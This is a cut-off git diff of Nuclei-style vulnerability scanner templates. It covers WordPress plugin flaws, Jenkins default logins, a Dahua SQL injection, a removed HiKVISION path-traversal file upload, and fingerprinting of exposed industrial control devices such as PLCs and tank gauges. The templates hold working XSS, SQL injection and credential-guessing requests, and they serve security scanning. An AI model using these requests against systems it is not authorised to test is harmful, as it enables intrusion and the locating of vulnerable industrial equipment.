https://wpscan.com/vulnerability/af548fab-96c2-4129-b609-e24aad0b1fc4 - https://nvd.nist.gov/vuln/detail/CVE-2021-25111 - tags: cve2021,unauth,wpscan,wp-plugin,redirect,wordpress,wp,cve + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-25111 cwe-id: CWE-601 + epss-score: 0.00106 + epss-percentile: 0.42122 + cpe: cpe:2.3:a:english_wordpress_admin_project:english_wordpress_admin:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 1 + vendor: english_wordpress_admin_project + product: english_wordpress_admin + framework: wordpress + tags: cve2021,cve,unauth,wpscan,wp-plugin,redirect,wordpress,wp,english_wordpress_admin_project -requests: +http: - method: GET path: - "{{BaseURL}}/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh" @@ -24,6 +37,5 @@ requests: - type: regex part: header regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1 - -# Enhanced by md on 2022/10/14 + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 +# digest: 4a0a00473045022100b6913aba1c72c55da8551e0917a22c516741c18717ffea0c7280d1adb54b6f7b0220752ca9e7e8ffc2c6f70da248526c72f2fa6401f0551c65ff1fc058405dc487c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-0149.yaml b/poc/cve/cve-2022-0149.yaml index ef415ad101..136a815fff 100644 --- a/poc/cve/cve-2022-0149.yaml +++ b/poc/cve/cve-2022-0149.yaml @@ -1,21 +1,36 @@ id: CVE-2022-0149 info: - name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Reflected Cross-Site Scripting + name: WooCommerce Stored Exporter WordPress Plugin < 2.7.1 - Cross-Site Scripting author: dhiyaneshDk severity: medium description: The plugin was affected by a reflected cross-site scripting vulnerability in the woo_ce admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Update to the latest version of the WooCommerce Stored Exporter WordPress Plugin (2.7.1) or apply the vendor-provided patch to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/e47c288a-2ea3-4926-93cc-113867cbc77c - https://nvd.nist.gov/vuln/detail/CVE-2022-0149 + - https://plugins.trac.wordpress.org/changeset/2654545/woocommerce-exporter + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2022-0149 cwe-id: CWE-79 - tags: cve,cve2022,wordpress,wp-plugin,xss,woocommerce,authenticated + epss-score: 0.001 + epss-percentile: 0.40139 + cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: visser + product: store_exporter_for_woocommerce + framework: wordpress + tags: cve,cve2022,wpscan,wordpress,wp-plugin,xss,woocommerce,authenticated,visser -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -29,7 +44,6 @@ requests: GET /wp-admin/admin.php?page=woo_ce&failed=1&message=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -45,5 +59,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/02/28 +# digest: 4a0a0047304502202e7a4ad224a01fb7e302b35a466effdce8c1ab91a0159ee0a5aa7e2f156ff75502210090a13e099a971610a1ffc1c1d6173e1e325a337b5ce510b4e8945c909b24b5c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/cve/cve-2022-27849.yaml b/poc/cve/cve-2022-27849.yaml index d52f9a2027..8aa1ca42b3 100644 --- a/poc/cve/cve-2022-27849.yaml +++ b/poc/cve/cve-2022-27849.yaml @@ -6,20 +6,33 @@ info: severity: high description: | WordPress Simple Ajax Chat before 20220216 is vulnerable to sensitive information disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it. + impact: | + An attacker can exploit this vulnerability to gain access to sensitive information, such as user credentials or private messages. + remediation: | + Update to the latest version of the WordPress Simple Ajax Chat plugin to fix the vulnerability. reference: - https://wordpress.org/plugins/simple-ajax-chat/#developers - https://patchstack.com/database/vulnerability/simple-ajax-chat/wordpress-simple-ajax-chat-plugin-20220115-sensitive-information-disclosure-vulnerability - https://nvd.nist.gov/vuln/detail/CVE-2022-27849 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2022-27849 cwe-id: CWE-200 + epss-score: 0.00713 + epss-percentile: 0.80067 + cpe: cpe:2.3:a:plugin-planet:simple_ajax_chat:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 + vendor: plugin-planet + product: simple_ajax_chat + framework: wordpress google-query: inurl:/wp-content/plugins/simple-ajax-chat/ - tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure + tags: cve,cve2022,wp,wordpress,wp-plugin,disclosure,plugin-planet -requests: +http: - method: GET path: - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv' @@ -42,5 +55,4 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/15 +# digest: 490a0046304402200ac201e5da2db9585d76d187f6a6ede0350f1c6230c3c80676234cb41a9e8259022037d381d175e583e6490612c81f07c12a325a2dc7252ba6dcc9f5d27cc59d94d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/detect/hipcam-detect.yaml b/poc/detect/hipcam-detect.yaml new file mode 100644 index 0000000000..8cb51d1337 --- /dev/null +++ b/poc/detect/hipcam-detect.yaml @@ -0,0 +1,50 @@ +id: hipcam-ip-camera-detection + +info: + name: Hipcam IP Camera Detection + author: Redflare Cyber + severity: medium + description: This template checks for Hipcam IP cameras and identifies them via the RTSP service on TCP port 554. + classification: + cwe-id: CWE-284 + metadata: + max-request: 1 + shodan-query: 'port:554 "Server: Hipcam RealServer/V1.0"' + tags: hipcam,ipcamera,tcp,rtsp,IoT + +requests: + - raw: + - | + OPTIONS rtsp://{{Hostname}}:{{Port}}/ RTSP/1.0 + CSeq: 1 + + matchers-condition: and + matchers: + - type: word + words: + - "RTSP/1.0 200 OK" + - "Server: Hipcam RealServer/V1.0" + + - type: regex + regex: + - "Public:.*OPTIONS,.*DESCRIBE,.*SETUP,.*TEARDOWN,.*PLAY,.*SET_PARAMETER,.*GET_PARAMETER" + +tcp: + - inputs: + - data: "\r\n" + host: + - "{{Hostname}}" + port: 554 + + matchers: + - type: word + words: + - "RTSP/1.0 200 OK" + - "Server: Hipcam RealServer/V1.0" + - "OPTIONS,DESCRIBE,SETUP,TEARDOWN,PLAY,SET_PARAMETER,GET_PARAMETER" + + extractors: + - type: regex + part: body + regex: + - "CSeq: ([0-9]+)" diff --git a/poc/detect/rockwell-plc-detect.yaml b/poc/detect/rockwell-plc-detect.yaml new file mode 100644 index 0000000000..88b3460a25 --- /dev/null +++ b/poc/detect/rockwell-plc-detect.yaml @@ -0,0 +1,234 @@ +id: rockwell-automation-plc-detection + +info: + name: Rockwell Automation/Allen-Bradley PlC Detection with Version Matching + author: Redflare Cyber + severity: low + description: | + This template detects Rockwell Automation/Allen-Bradley devices by checking for specific strings in the response on TCP port 44818, including Vendor ID, Product Name, Device Type, Serial Number, and known version identifiers. + metadata: + max-request: 1 + shodan-query: 'port:44818 product:"Rockwell Automation/Allen-Bradley"' + tags: rockwell-allen-bradley,scada,IIoT,network,tcp + +tcp: + - inputs: + - data: "63000000000000000000000000000000c1debed100000000" + type: hex + + host: + - "{{Hostname}}" + port: 44818 + read-size: 1024 + matchers: + - type: word + words: + - "Vendor ID: Rockwell Automation/Allen-Bradley" + - "Product name:" + - "Device type:" + - "Serial number:" + part: body + condition: and + + - type: regex + regex: + - "1769-L19ER-BB1B/A LOGIX5319ER" + - "1766-L32BXBA C/21.02" + - "2080-LC20-20QWB" + - "1769-L33ER/A LOGIX5333ER" + - "1766-L32AWA C/21.02" + - "1769-L24ER-QBFC1B/A LOGIX5324ER" + - "1769-L32E Ethernet Port" + - "1766-L32BWA C/21.02" + - "1756-L61/B LOGIX5561" + - "1766-L32BXB C/21.02" + - "1766-L32BXBA C/21.07" + - "1766-L32AWA C/21.07" + - "1769-L18ER/B LOGIX5318ER" + - "2080-LC50-24QWB" + - "1769-L30ER/A LOGIX5330ER" + - "1756-ENBT/A" + - "1766-L32AWAA C/21.02" + - "1769-L16ER/B LOGIX5316ER" + - "1769-L24ER-QB1B/A LOGIX5324ER" + - "1766-L32BWAA C/21.02" + - "1766-L32BXBA B/15.00" + - "1763-L16DWD B/16.00" + - "1766-L32AWA C/21.06" + - "1769-L27ERM-QxC1B/A LOGIX5327ERM" + - "1756-EN2T/D" + - "1769-L35E Ethernet Port" + - "1766-L32BXB B/15.00" + - "1766-L32AWA B/15.00" + - "1763-L16DWD B/14.00" + - "1766-L32BXB B/13.00" + - "2080-LC50-24QBB" + - "1766-L32BWA B/15.00" + - "1766-L32BWAA C/21.07" + - "1763-L16BWA B/14.00" + - "1763-L16BWA B/16.00" + - "1763-L16BWA B/9.00" + - "1766-L32AWAA C/21.07" + - "1766-L32BWAA B/15.00" + - "1763-L16AWA B/16.00" + - "1763-L16BBB B/14.00" + - "1763-L16BBB B/16.00" + - "1766-L32BXBA C/21.06" + - "2080-LC50-48QWB" + - "1766-L32BXBA B/14.00" + - "1766-L32AWAA B/15.00" + - "1766-L32BWAA B/15.04" + - "1766-L32AWA B/16.00" + - "1769-L19ER-BB1B/C LOGIX5319ER" + - "1763-L16BWA B/11.00" + - "1766-L32BWAA B/16.00" + - "5069-L306ER/A" + - "1766-L32BWA B/16.00" + - "1763-L16AWA B/14.00" + - "1766-L32BWAA B/14.00" + - "1766-L32BXBA B/16.00" + - "1763-L16BBB B/11.00" + - "1766-L32BXB B/10.00" + - "1769-L18ER/A LOGIX5318ER" + - "1769-L36ERM/A LOGIX5336ERM" + - "2080-LC20-20AWB" + - "1766-L32BXB B/11.00" + - "1766-L32BXBA B/11.00" + - "1766-L32BWAA C/21.06" + - "1763-L16BWA B/12.00" + - "1766-L32AWAA C/21.06" + - "1766-L32BWAA B/13.00" + - "2080-LC20-20QBB" + - "1763-L16AWA B/12.00" + - "1766-L32BXB A/5.00" + - "1766-L32BXB C/21.07" + - "1766-L32BXBA B/13.00" + - "1761-NET-ENI/D" + - "1763-L16AWA B/9.00" + - "2080-LC50-24AWB" + - "1766-L32BWA C/21.07" + - "5069-L320ER/A" + - "1766-L32AWA B/11.00" + - "1769-L33ERM/A LOGIX5333ERM" + - "1763-L16DWD B/12.00" + - "1766-L32AWAA B/11.00" + - "1766-L32BXB B/14.00" + - "1756-EN2T/C" + - "1763-L16AWA A/3.00" + - "1763-L16BBB B/12.00" + - "1766-L32AWAA B/14.00" + - "1766-L32BWA B/10.00" + - "1766-L32BWA B/11.00" + - "1766-L32BWA C/21.06" + - "1766-L32BXBA B/10.00" + - "1769-L30ERMS/A LOGIX5370SAFETY" + - "2080-LC50-48AWB" + - "1747-L551/C C/11 - DC 3.46" + - "1756-EN2TR/C 217021900" + - "1763-L16BBB B/9.00" + - "1763-L16DWD B/9.00" + - "1766-L32BWA B/14.00" + - "1768-ENBT/A" + - "2080-LC70-24QWB" + - "1747-L553 C/6 - DC 2.50" + - "1756-EWEB/A" + - "1763-L16BWA B/15.02" + - "1766-L32AWAA B/13.00" + - "1766-L32BXB B/16.00" + - "1766-L32BXBA A/5.00" + - "1766-L32BXBA B/21.07" + - "1769-L16ER/A LOGIX5316ER" + - "1769-L24ER-QB1B/B LOGIX5324ER" + - "2080-L50E-24QBB" + - "2080-LC50-48QBB" + - "1747-L551/C C/10 - DC 3.46" + - "1747-L552/C C/11 - DC 3.46" + - "1763-L16AWA B/11.00" + - "1747-L551/C C/13 - DC 3.54" + - "1756-L81E/B" + - "1766-L32AWA B/10.00" + - "1766-L32AWAA B/16.00" + - "1766-L32BWA B/13.00" + - "1766-L32BWAA B/10.00" + - "1769-L36ERMS/A LOGIX5370SAFETY" + - "2080-L50E-24QWB" + - "1747-L553/C C/11 - DC 3.46" + - "1766-L32AWA B/14.00" + - "1766-L32AWAA A/5.00" + - "1766-L32BWAA B/11.00" + - "1766-L32BWAA B/21.03" + - "1769-L30ERMS/B LOGIX5370SAFETY" + - "5069-L310ER/A" + - "5069-L330ER/A" + - "PanelView Plus_6 1000" + - "1408-EM3A-ENT, Series B" + - "1747-L552/C C/13 - DC 3.54" + - "1756-EN3TR/B" + - "1766-L32AWA B/13.00" + - "1766-L32BWA A/5.00" + - "1766-L32BXB C/21.06" + - "1769-L16ER-BB1B/C LOGIX5316ER" + - "1769-L24ER-QBFC1B/B LOGIX5324ER" + - "1769-L27ERM-QxC1B/B LOGIX5327ERM" + - "1769-L37ERM/A LOGIX5337ERM" + - "1747-L552/C C/10 - DC 3.46" + - "1763-L16BWA A/3.00" + - "1766-L32AWA A/4.00" + - "1766-L32AWA A/5.00" + - "1766-L32AWA B/21.06" + - "1766-L32AWA B/21.07" + - "1766-L32AWAA B/21.03" + - "1766-L32BWA A/7.00" + - "1766-L32BXBA B/21.02" + - "1769-L18ERM/B LOGIX5318ERM" + - "1769-L23E-QBFC1 Ethernet Port" + - "2080-L50E-48QWB" + - "2711R-T10T/A" + - "2711R-T4T/B" + - "5069-L306ERM/A" + - "5069-L310ERMS2/B" + - "5069-L330ERMS3/A" + - "BGT Cellular Module" + - "EIP Adapter1" + - "Emulate 5380 Controller" + - "Emulate 5580 Controller" + - "EtherNetIP Master Stack Library" + - "PanelView Plus 7 Perf 1000" + - "PanelView Plus_7 Standard 1000" + - "1734-AENT/B Ethernet Adapter" + - "1747-L551 C/6 - DC 2.50" + - "1747-L552 C/8 - DC 2.59" + - "1747-L553/C C/13 - DC 3.54" + - "1756-EN2TR/C" + - "1763-L16AWA B/00.00" + - "1763-L16DWD B/11.00" + - "1763-L16DWD B/15.02" + - "1766-L32AWA A/3.00" + - "1766-L32AWA B/21.05" + - "1766-L32AWA C/21.05" + - "1766-L32AWAA B/10.00" + - "1766-L32AWAA C/21.03" + - "1766-L32BWA A/3.00" + - "1766-L32BWA A/4.00" + - "1766-L32BWAA A/3.00" + - "1766-L32BWAA B/21.07" + - "1766-L32BWAA C/21.04" + - "1766-L32BXB A/7.00" + - "1766-L32BXBA B/15.05" + - "1766-L32BXBA B/21.00" + - "1766-L32BXBA B/21.04" + - "1769-L23E-QB1 Ethernet Port" + - "1769-L36ERMS/B LOGIX5370SAFETY" + - "2080-L50E-24AWB" + - "2080-LC50-24QVB" + - "2080-LC70-24QBB" + - "5069-L306ERS2/B" + - "5069-L320ERM/A" + - "5069-L320ERMS2/B" + - "PLC-5/40E E/H - DC 2.53" + - "PLC-5/40E E/K - DC 2.64" + - "PanelView Plus 7 Perf 700" + - "PanelView Plus_7 Standard 1200W" + - "PanelView Plus_7 Standard 600" + - "PowerMonitor 5000" + part: body diff --git a/poc/detect/wowza-streaming-detect.yaml b/poc/detect/wowza-streaming-detect.yaml index 474f52504a..20093618e0 100644 --- a/poc/detect/wowza-streaming-detect.yaml +++ b/poc/detect/wowza-streaming-detect.yaml @@ -1,15 +1,17 @@ id: wowza-streaming-engine + info: name: Wowza Streaming Engine author: dhiyaneshDK severity: info - metadata: - shodan-query: http.title:"Manager" product:"Wowza Streaming Engine" + reference: https://www.shodan.io/search?query=http.title%3A%22Manager%22+product%3A%22Wowza+Streaming+Engine%22 tags: panel + requests: - method: GET path: - '{{BaseURL}}/enginemanager/ftu/welcome.htm' + matchers-condition: and matchers: - type: word diff --git a/poc/exposed/frontpage-exposure.yaml b/poc/exposed/frontpage-exposure.yaml new file mode 100644 index 0000000000..6d3255435b --- /dev/null +++ b/poc/exposed/frontpage-exposure.yaml @@ -0,0 +1,34 @@ +id: frontpage-pwd-file + +info: + name: Frontpage service-vti Configuration File - Detect + author: Redflare Cyber + severity: high + description: Frontpage config file was detected. + metadata: + max-request: 1 + tags: config,exposure,frontpage + +http: + - method: GET + path: + - "{{BaseURL}}/_vti_pvt/service.pwd" + - "{{BaseURL}}_vti_pvt/administrators.pwd" + - "{{BaseURL}}_vti_pvt/authors.pwd" + matchers-condition: and + matchers: + - type: word + words: + - "admin" + - "webmaster" + - "administrator" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 diff --git a/poc/java/jboss-web-console.yaml b/poc/java/jboss-web-console.yaml old mode 100755 new mode 100644 index 8333db7f7b..87264c77fe --- a/poc/java/jboss-web-console.yaml +++ b/poc/java/jboss-web-console.yaml @@ -1,30 +1,22 @@ id: jboss-web-console info: name: JBoss Management Console Server Information - author: - - l0ne1y - description: |- - JBoss管理控制台服务器信息泄露漏洞 - 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + author: dhiyaneshDK severity: low - remediation: |- - 官方修复方案: - 1、建议用户到官方获取最新补丁或者最新版本程序: - https://jbossweb.jboss.org/ - 临时修复方案: - 1、禁止带有敏感数据的Web页面展示,以防止敏感信息泄漏。 - 2、对必须发送的敏感数据或页面请求接口做好严格的权限认证 + reference: + - https://www.exploit-db.com/ghdb/5215 + tags: jboss,unauth requests: -- matchers: - - type: word - condition: and - words: - - Application Server - - Management Console - - type: status - status: - - 200 - matchers-condition: and - path: - - '{{BaseURL}}/web-console/ServerInfo.jsp' - method: GET + - method: GET + path: + - "{{BaseURL}}/web-console/ServerInfo.jsp" + matchers-condition: and + matchers: + - type: word + words: + - "Application Server" + - "Management Console" + condition: and + - type: status + status: + - 200 diff --git a/poc/jenkins/jenkins-weak-password.yaml b/poc/jenkins/jenkins-weak-password.yaml old mode 100755 new mode 100644 index 84d3b8f678..08508605ce --- a/poc/jenkins/jenkins-weak-password.yaml +++ b/poc/jenkins/jenkins-weak-password.yaml @@ -1,45 +1,52 @@ id: jenkins-weak-password info: name: Jenkins Default Login - author: - - l0ne1y - tags: - - jenkins - - default-login - description: |- - Jenkins 默认口令登录漏洞 - CloudBees Jenkins(Hudson Labs)是美国CloudBees公司的一套基于Java开发的持续集成工具。该产品主要用于监控持续的软件版本发布/测试项目和一些定时执行的任务。Audit Trail Plugin是使用在其中的一个审核日志记录插件。其管理后台存在默认账户admin/admin,攻击者可通过默认账户登录后台实施高危操作。 + author: Zandros0 severity: high + tags: jenkins,default-login + description: Jenkins default admin login information was discovered. classification: - cwe-id: - - cwe-522 cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 - remediation: |- - 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 - 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 - 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 - 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) - 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) + cve-id: + cwe-id: CWE-522 requests: -- matchers: - - type: dsl - condition: and - dsl: - - contains(body_3, "/logout") - - contains(body_3, "Dashboard [Jenkins]") - raw: - - | - GET / HTTP/1.1 - Host: {{Hostname}} - - | - POST /j_spring_security_check HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded + - raw: + - | + GET /login HTTP/1.1 + Host: {{Hostname}} + - | + POST /j_spring_security_check HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Cookie: {{cookie}} - j_username=admin&j_password=admin&from=%2F&Submit=Sign+in - - | - GET / HTTP/1.1 - Host: {{Hostname}} - cookie-reuse: true - req-condition: true + j_username={{username}}&j_password={{password}}&from=%2F&Submit=Sign+in + - | + GET / HTTP/1.1 + Host: {{Hostname}} + Cookie: {{cookie}} + attack: pitchfork + payloads: + username: + - admin + - jenkins + password: + - admin + - password + extractors: + - type: regex + name: cookie + internal: true + part: header + regex: + - 'JSESSIONID\..*=([a-z0-9.]+)' + req-condition: true + matchers: + - type: dsl + condition: and + dsl: + - 'contains(body_3, "/logout")' + - 'contains(body_3, "Dashboard [Jenkins]")' + +# Enhanced by mp on 2022/03/10 diff --git a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml index e86e8491d1..cd961f6e81 100644 --- a/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml +++ b/poc/microsoft/Hikvision_iVMS-8700_Fileupload_report.yaml @@ -1,40 +1,27 @@ id: HiKVISION info: - name: HiKVISION Comprehensive Security Management Platform Report Arbitrary File Upload Vulnerability - author: Zero Trust Security Attack and Defense Laboratory - severity: high + name: HiKVISION Integrated Security Management Platform Env Information Leakage Vulnerability + author: zerZero Trust Security Attack and Defense Laboratoryo + severity: medium description: | - There is an arbitrary file upload vulnerability in the HiKVISION comprehensive security management platform report interface. Attackers can upload arbitrary files and obtain server privileges by constructing special request packets + There is an information leakage vulnerability in the HIKVISION comprehensive security management platform, which allows attackers to obtain sensitive information such as environmental env for further attacks metadata: - fofa-query: app="HIKVISION-综合安防管理平台" || title=="综合安防管理平台" + fofa-query: app="HIKVISION-综合安防管理平台" hunter-query: web.icon="3670cbb1369332b296ce44a94b7dd685" http: - - raw: - - | - POST /svm/api/external/report HTTP/1.1 - Host: {{Hostname}} - Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9PggsiM755PLa54a + - method: GET + path: + - "{{BaseURL}}/artemis-portal/artemis/env" - ------WebKitFormBoundary9PggsiM755PLa54a - Content-Disposition: form-data; name="file"; filename="../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/test.jsp" - Content-Type: application/zip - - <%out.print("test");%> - - ------WebKitFormBoundary9PggsiM755PLa54a-- - - | - GET /portal/ui/login/..;/..;/test.jsp HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36 - - req-condition: true + matchers-condition: and matchers: - - type: dsl - dsl: - - 'status_code_1 == 200' - - 'contains(body_1, "data")' - - 'status_code_2 == 200' - - 'contains(body_2, "test")' - condition: and + - type: word + part: body + words: + - "profiles" + + - type: status + status: + - 200 diff --git a/poc/other/Dahua_getUserInfoByUserName.yaml b/poc/other/Dahua_getUserInfoByUserName.yaml index 77936cf562..78d89c1465 100644 --- a/poc/other/Dahua_getUserInfoByUserName.yaml +++ b/poc/other/Dahua_getUserInfoByUserName.yaml @@ -1,31 +1,29 @@ id: Dahua info: - name: Dahua Smart Park Comprehensive Management Platform User_ GetUserInfoByUserName.action Account Password Disclosure Vulnerability + name: Dahua Smart Park Comprehensive Management Platform getFaceCapture SQL Injection Vulnerability author: Zero Trust Security Attack and Defense Laboratory - severity: medium + severity: high description: | - Dahua Smart Park Comprehensive Management Platform User_ API interface exists in getUserInfoByUserName.action, which leads to password leakage of the management park account + There is an SQL injection vulnerability in the getFaceCapture interface of Dahua Smart Park Comprehensive Management Platform, which allows attackers to execute arbitrary SQL statements and obtain sensitive database information through the vulnerability metadata: fofa-query: app="dahua-智慧园区综合管理平台" hunter-query: web.body="/WPMS/asset/lib/json2.js" + + http: - method: GET path: - - "{{BaseURL}}/admin/user_getUserInfoByUserName.action?userName=system" + - "{{BaseURL}}/portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20md5(1)),0x7e),1)--%22%7D/extend/%7B%7D" matchers-condition: and matchers: - type: word part: body words: - - "loginName" - - "loginPass" + - "c4ca" - type: status status: - - 200 - -# 获取后访问地址 -# /admin/login_login.action + - 500 diff --git a/poc/other/gavazzi-automation.yaml b/poc/other/gavazzi-automation.yaml new file mode 100644 index 0000000000..e848d1cab3 --- /dev/null +++ b/poc/other/gavazzi-automation.yaml @@ -0,0 +1,87 @@ +id: gavazzi-automation + +info: + name: gavazzi-automation-UWP-3.0-WebApp + author: Redflare-cyber + severity: info + description: Login for UWP 3.0 Web Application by Gavazzi Automation was detected on target host. + reference: + - https://www.gavazziautomation.com/en-global/ + - https://github.com/edoardottt/favirecon + metadata: + max-request: 2 + fofa-query: icon_hash="2103098667" && title=="UWP3.0 Web" + tags: scada,iiot,ics,tech,favicon + +http: + - method: GET + path: + - "{{BaseURL}}/favicon.ico" + - "{{BaseURL}}/images/favicon.ico" + - "{{BaseURL}}/assets/icons/apple-icon-57x57.png" + - "{{BaseURL}}/assets/icons/apple-icon-120x120.png" + - "{{BaseURL}}/assets/icons/apple-icon-180x180.png" + - "{{BaseURL}}/assets/icons/android-icon-192x192.png" + - "{{BaseURL}}/assets/icons/favicon-32x32.png" + - "{{BaseURL}}/assets/icons/favicon-96x96.png" + - "{{BaseURL}}/assets/icons/favicon-16x16.png" + + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + matchers: + - type: dsl + name: "gavazzi1" + dsl: + - "status_code==200 && (\"-1740901199\" == mmh3(base64_py(body)))" + + - type: dsl + name: "gavazzi2" + dsl: + - "status_code==200 && (\"-653070107\" == mmh3(base64_py(body)))" + + + - type: dsl + name: "gavazzi3" + dsl: + - "status_code==200 && (\"-1303468522\" == mmh3(base64_py(body)))" + + - type: dsl + name: "gavazzi3" + dsl: + - "status_code==200 && (\"712041840\" == mmh3(base64_py(body)))" + + + - type: dsl + name: "gavazzi4" + dsl: + - "status_code==200 && (\"2134643867\" == mmh3(base64_py(body)))" + + - type: dsl + name: "gavazzi4" + dsl: + - "status_code==200 && (\"-993331329\" == mmh3(base64_py(body)))" + + + - type: dsl + name: "gavazzi5" + dsl: + - "status_code==200 && (\"576329580\" == mmh3(base64_py(body)))" + + - type: dsl + name: "gavazzi6" + dsl: + - "status_code==200 && (\"2103098667\" == mmh3(base64_py(body)))" + + + - type: dsl + name: "gavazzi7" + dsl: + - "status_code==200 && (\"2103098667\" == mmh3(base64_py(body)))" + + + extractors: + - type: dsl + dsl: + - 'mmh3(base64_py(body))' diff --git a/poc/other/intank-iiot.yaml b/poc/other/intank-iiot.yaml new file mode 100644 index 0000000000..5364c47828 --- /dev/null +++ b/poc/other/intank-iiot.yaml @@ -0,0 +1,43 @@ +id: in-tank-inventory-tcp-detection + +info: + name: In-Tank Inventory Detection + author: Redflare Cyber + severity: medium + description: This template detects systems running an in-tank inventory service on TCP port 10001 by sending the I20100 command and analyzing the response. + reference: + - https://github.com/sjhilt/Nmap-NSEs/blob/master/atg-info.nse + metadata: + shodan-query: '"in-tank-inventory" port:10001' + tags: iiot,ics,scada,exposure + +tcp: + - host: + - "{{Hostname}}" + port: 10001 + + inputs: + - data: "\x01I20100\n" + read-size: 1024 + + matchers: + - type: regex + regex: + - "(?i)IN-TANK INVENTORY" + part: body + + - type: regex + regex: + - "^SEP\\s\\d{2},\\s\\d{4}" # Example date format in the response + part: body + + - type: word + words: + - "TANK PRODUCT" + part: body + + extractors: + - type: regex + regex: + - "(?m)TANK PRODUCT.*$" + diff --git a/poc/other/siemens-simatic.yaml b/poc/other/siemens-simatic.yaml new file mode 100644 index 0000000000..20cea49793 --- /dev/null +++ b/poc/other/siemens-simatic.yaml @@ -0,0 +1,34 @@ +id: siemens-plc-detect + +info: + name: Siemens PLC - Detect + author: Redflare-Cyber + severity: info + description: | + A Siemens PLC has been potentially detected. + Heuristics in the response indicate a possible Siemens PLC installation. + metadata: + verified: true + max-request: 1 + vendor: Siemens + product: siemens + shodan-query: + - html:"Overview - Siemens, SIMATIC" + - http.html:"overview - siemens, simatic" + fofa-query: body="overview - siemens, simatic" + tags: siemens,scada,IIoT,cti,network,tcp +tcp: + - inputs: + - data: "0300001611e00000000400c1020100c2020102c0010a" + type: hex + + host: + - "{{Hostname}}" + port: 102 + read-size: 1024 + + matchers: + - type: binary + binary: + - "0300001611d00004000100c1020100c2020102c0010a" + - "0300001611d00004443100c0010ac1020100c2020102" diff --git a/poc/remote_code_execution/woocommerce-multiple-free-gift.yaml b/poc/remote_code_execution/woocommerce-multiple-free-gift.yaml new file mode 100644 index 0000000000..acb2e1119b --- /dev/null +++ b/poc/remote_code_execution/woocommerce-multiple-free-gift.yaml @@ -0,0 +1,59 @@ +id: woocommerce-multiple-free-gift + +info: + name: > + WooCommerce Multiple Free Gift <= 1.2.3 - Insufficient Server-Side Validation to Arbitrary Gift Adding + author: topscoder + severity: low + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - 